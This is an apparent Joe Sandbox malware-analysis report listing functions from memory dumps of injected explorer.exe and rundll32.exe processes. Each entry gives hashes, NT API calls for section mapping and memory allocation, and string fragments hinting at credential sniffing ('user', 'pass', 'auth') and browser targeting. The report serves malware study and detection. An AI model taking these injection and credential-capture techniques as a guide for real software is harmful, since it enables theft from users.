Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 176ca4fa30a9f4a7965552072f33f4d5d20b65efa73639706ff424b378344fd0
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 9641B670608B4D4FD769DF2880943AAB7D1FBD8340F64462F949EC7296DB70D445CB42

Function 0F9E50B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

f fr, xrefs: 0F9E513D
om:, xrefs: 0F9E5146
, xrefs: 0F9E5184
Snif, xrefs: 0F9E5154

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: f3401bf86a6a20b9fec4c3c21d05258ab395fe6f16424e0514305b41d7e860e6
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: B731C17150CB886FD72AEB28C4846DAB7D4FBC4300F50491EE49BC7293EE35A54ACB42

Function 0F9E50C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

f fr, xrefs: 0F9E513D
om:, xrefs: 0F9E5146
, xrefs: 0F9E5184
Snif, xrefs: 0F9E5154

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 2a6943b504708fcda20f51c6fe0cda22bcbfe57f24bae5c59e71bc59fa05e19a
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 3631C171508B486FD72AEB28C4846EAB7D4FBD4300F50491EE49BC7297EE34E54ACB42

Function 0F9E0FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

chro, xrefs: 0F9E1023
hild, xrefs: 0F9E0FF6
.dll, xrefs: 0F9E0FFE
me_c, xrefs: 0F9E0FEE

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: b7d10f9a1996577ff317411533e40ffcab23cbc6d6ba28ff5b08e59beeaa9ae7
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 01318E70118B484FCB86EF688494BAAB7E1FFD8301F94462DA44ECB2A6DF34D545CB52

Function 0F9E0FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

chro, xrefs: 0F9E1023
hild, xrefs: 0F9E0FF6
.dll, xrefs: 0F9E0FFE
me_c, xrefs: 0F9E0FEE

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 3597cef6b7e795d5c0e6d520152fca7bef545b935d4e37cd61fd46e8439f7e4c
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 64317E70118B484FCB96EF688494BAAB7E1FFD8300F94462DA44ACB2A6DF34D545CB52

Function 0F9E38C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

on.d, xrefs: 0F9E3902
User-Agent: , xrefs: 0F9E3935, 0F9E3948
urlmon.dll, xrefs: 0F9E3959
nt: , xrefs: 0F9E391E

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: f65e601af08d1693f73cce6e742b66b9db7624f99e0b08c6b1f4847eab167540
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 1F31D431614B0D8FCB05EFA8C8847EDB7E4FB98205F40022AD54ED7292DF788649CB89

Function 0F9E38BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

on.d, xrefs: 0F9E3902
User-Agent: , xrefs: 0F9E3935, 0F9E3948
urlmon.dll, xrefs: 0F9E3959
nt: , xrefs: 0F9E391E

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: d634c449880eb67e32108809f1223577296c57523d04790dda1b943491b3dbf0
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 4121E930610B0D8FCB05EFA8C4847ED7BE4FF98205F40421AD55AD7292DF788645CB89

Function 0F9E4E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0F9E4F03
l, xrefs: 0F9E4F26
., xrefs: 0F9E4F1F
t, xrefs: 0F9E4EF4

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: f627a19ac6a8602d77224c0864a7fb416f3e76028ba91de970f155cccbb0e866
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 4F217A70A24B0D9BDB48EFA8C4447EDBBF1FB58300F50462ED009D3652DB7895958B84

Function 0F9E4E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0F9E4F03
l, xrefs: 0F9E4F26
., xrefs: 0F9E4F1F
t, xrefs: 0F9E4EF4

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 5c74c8a7e7ee57650a83c335e6526cc7f22d3834aa3936a132ae2ef9e22e9225
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 03217A70A24B0E9FDB48EFA8C0447AEBAF1FF58300F50462ED009D3652DB789595CB84

Function 0F9E4FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

auth, xrefs: 0F9E502F
pass, xrefs: 0F9E5022
logi, xrefs: 0F9E503C
user, xrefs: 0F9E5015

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: d5e9d723d70d81f6d67c7d30782c9d384c08be76489c667628ca16b2762ff9cc
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: A221C070614B0D8BCB06DF9998807EEB7E1EFC8344F054619E40AEB396D7B5E9148BC2

Analysis Process: rundll32.exePID: 1576, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	6.7%
Signature Coverage:	0%
Total number of Nodes:	624
Total number of Limit Nodes:	69

Executed Functions

Function 047AA036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 047AA19F

Strings

0, xrefs: 047AA227

Memory Dump Source

Source File: 00000008.00000002.4541190154.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_47a0000_rundll32.jbxd

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
Instruction ID: 5d5ed873d4c0c42b1e36a1822824a319900443863c87e7628797831c23abed77
Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
Instruction Fuzzy Hash: 0BF15274918A4C8FDBA9EF68C898AEEB7E1FF98304F40462AD44ED7250DF34A551CB41

Function 047A9BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 047A9C93
NtMapViewOfSection.NTDLL ref: 047A9CFF
NtClose.NTDLL ref: 047A9DC5

Strings

@, xrefs: 047A9C8B
@, xrefs: 047A9D0C

Memory Dump Source

Source File: 00000008.00000002.4541190154.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_47a0000_rundll32.jbxd

Similarity

API ID: Section$CloseCreateView
String ID: @$@
API String ID: 1133238012-149943524
Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
Instruction ID: 208ad2b65e4bf5e2ab553e18898f16f8b55bc5f4a9d1b152650adc7e34f53d77
Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
Instruction Fuzzy Hash: 776194B0118B088FCB58DF68D8856AABBE0FF98314F50062EE58AC3751DF35E451CB86

Function 047A9BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 047A9C93
NtMapViewOfSection.NTDLL ref: 047A9CFF

Strings

@, xrefs: 047A9C8B
@, xrefs: 047A9D0C

Memory Dump Source

Source File: 00000008.00000002.4541190154.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_47a0000_rundll32.jbxd

Similarity

API ID: Section$CreateView
String ID: @$@
API String ID: 1585966358-149943524
Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
Instruction ID: 40bf25d83fdedcd094785e94bac38228231ddad0bfbcc4e9dec74f8f3bb90b25
Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
Instruction Fuzzy Hash: 5B515FB0618B088FD758DF18D8956AABBE0FB98314F50062EE58AD3651DF35E481CB86

Function 047AA042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 047AA19F

Strings

0, xrefs: 047AA0CD

Memory Dump Source

Source File: 00000008.00000002.4541190154.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_47a0000_rundll32.jbxd

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
Instruction ID: efcf7b39e82820cb7974eb117eafc7d50fa34c33ba19b01bc7a117da69d55a10
Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
Instruction Fuzzy Hash: BF512D70918A8C8FDBA9EF68C8946EEBBF4FB98305F40462ED44AD7250DF309645CB41

Function 007AA350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,007A4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,007A4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 007AA39D

Strings

.z`, xrefs: 007AA38D, 007AA398

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: c86a4f4d5dd8c7f42968bd1417f596e22554834d81f75021aa395c77c8d010aa
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 7FF0BDB2200208AFCB48CF88DC85EEB77ADAF8C754F158248BA1D97241C630E811CBA4

Function 007AA400 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!Jz,FFFFFFFF,?,bMz,?,00000000), ref: 007AA445

Strings

!Jz, xrefs: 007AA41C, 007AA428

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !Jz
API String ID: 2738559852-2089339496
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: bcb72558084f104865f34752b2df2d8f35401a1e6b1751e7360bfbf95b0445cb
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 9FF0B7B2200208AFCB18DF89DC85EEB77ADEF8C754F158248BE1D97241D630E911CBA0

Function 007AA34A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,007A4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,007A4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 007AA39D

Strings

.z`, xrefs: 007AA38D, 007AA398

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 72938932b16b44c2ae16e7d63586980b453333b2797915cc557ce602824b82a9
Instruction ID: bd226d8a37f50c80c975fd7dd02ba9a3c78e5806568d7d405684c32a4ace3dc7
Opcode Fuzzy Hash: 72938932b16b44c2ae16e7d63586980b453333b2797915cc557ce602824b82a9
Instruction Fuzzy Hash: 90F0A5B2204508BB8F08CFA8D984DEB77EEAF8C310725864CFA5DD7204C634E8128B61

Function 007AA480 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(@Mz,?,?,007A4D40,00000000,FFFFFFFF), ref: 007AA4A5

Strings

@Mz, xrefs: 007AA49C, 007AA4A4

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: Close
String ID: @Mz
API String ID: 3535843008-2061303224
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 827cf6b8331806efb52c67e0ee5e14ca8c2c1c28842f921b21adb1c8a83ea2ec
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 14D01275200214BFD714EB98CC45E97775CEF44750F154555BA1C5B242C530F60087E0

Function 007AA52A Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00792D11,00002000,00003000,00000004), ref: 007AA569

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 28c3e7504914c46bb522233e716bf922b4f23b1eefe060d1897c2a1881c36bda
Instruction ID: 8ac5894670eedc912e48272df47d326dd5f78cc308e627c617871c589a6e4047
Opcode Fuzzy Hash: 28c3e7504914c46bb522233e716bf922b4f23b1eefe060d1897c2a1881c36bda
Instruction Fuzzy Hash: 97F0FEB6200149AFCB14DF88DC40EE777A9AF88354F154149FA5D97241C630E911CBB4

Function 007AA530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00792D11,00002000,00003000,00000004), ref: 007AA569

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: fede6b463d88e37b09dc35bb28cbec18ec74d629bf151b98fda893d45d448c71
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 70F015B2200208AFCB18DF89CC81EAB77ADAF88754F118248BE1C97241C630F910CBA0

Function 049A2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A2CAA

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a5fd20a1a007714168544a4e4773f40fd56988f07a118074fb45488aa2a519e
Instruction ID: 0cb9bf16685556d5b3a567ea848ba112583a021b6b8dd51644eb8e3bd048fa89
Opcode Fuzzy Hash: 8a5fd20a1a007714168544a4e4773f40fd56988f07a118074fb45488aa2a519e
Instruction Fuzzy Hash: 9190023120150402F100B598590C686004D8BE4305F55D021A5426555EC665D9916571

Function 049A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A2C7A

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cf52fb897f2431167d101aa75b97e70c20c3dc5793f4f9ef5646a40607da3dab
Instruction ID: 5e8751f1e1057efc32254bc2777ae8a0f3ef560158ab98852c38f0f8a8487f48
Opcode Fuzzy Hash: cf52fb897f2431167d101aa75b97e70c20c3dc5793f4f9ef5646a40607da3dab
Instruction Fuzzy Hash: A890023120158802F110B158890878A004D8BD4305F59C421A4826658D8695D9917561

Function 049A2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A2C6A

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b51abde513119a4bd0350e79da3ff8c874d00d2a7c35d83990c46fff5ce89ce0
Instruction ID: 479a0252a58eb9317a45b87a026e2e4c9004820ffac5ccef53450a4a17987dee
Opcode Fuzzy Hash: b51abde513119a4bd0350e79da3ff8c874d00d2a7c35d83990c46fff5ce89ce0
Instruction Fuzzy Hash: EC90023120150842F100B1584908B86004D8BE4305F55C026A0526654D8615D9517961

Function 049A2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A2DDA

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 061605d08525b44aeec7517a8d9f53cb6962f24220e6655e8da5c269468899a3
Instruction ID: b65b4b2a0f8aa920f59a58e2c1156e071da8e7957643541b70237ee4f93e08df
Opcode Fuzzy Hash: 061605d08525b44aeec7517a8d9f53cb6962f24220e6655e8da5c269468899a3
Instruction Fuzzy Hash: 36900221242541527545F1584908547404E9BE4245795C022A1816950C8526E956DA61

Function 049A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A2DFA

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 86eb022665994cadb3330e1da04334b563362155d87de9094303ad25ec3cbf1e
Instruction ID: 9759d54e4f59ac8900c5555f54d0b217d757aa40b0c7a0212b3db58f22d59acc
Opcode Fuzzy Hash: 86eb022665994cadb3330e1da04334b563362155d87de9094303ad25ec3cbf1e
Instruction Fuzzy Hash: 6190023120150413F111B1584A08747004D8BD4245F95C422A0826558D9656DA52A561

Function 049A2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A2D1A

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1c9313399d016d643f5b53c9c7520c510a6eb274bdb6810961dc7f6395f9a92c
Instruction ID: 4857f8ac809b13efa5008e6b06592edfec1a6571dbbad0e1d856507c377f2cf2
Opcode Fuzzy Hash: 1c9313399d016d643f5b53c9c7520c510a6eb274bdb6810961dc7f6395f9a92c
Instruction Fuzzy Hash: F090022921350002F180B158590C64A004D8BD5206F95D425A0417558CC915D9695761

Function 049A2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A2EAA

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c728dd289e10b2e24a8379c41b9ce4f5a9d26b19ffe6264fc2ce384a4cd21f00
Instruction ID: b14d95184746a4d2503595ea74ccee2b72a7c9889c540f3c45412d6f7ef1169c
Opcode Fuzzy Hash: c728dd289e10b2e24a8379c41b9ce4f5a9d26b19ffe6264fc2ce384a4cd21f00
Instruction Fuzzy Hash: 7D90027120150402F140B1584908786004D8BD4305F55C021A5466554E8659DED56AA5

Function 049A2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A2FEA

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

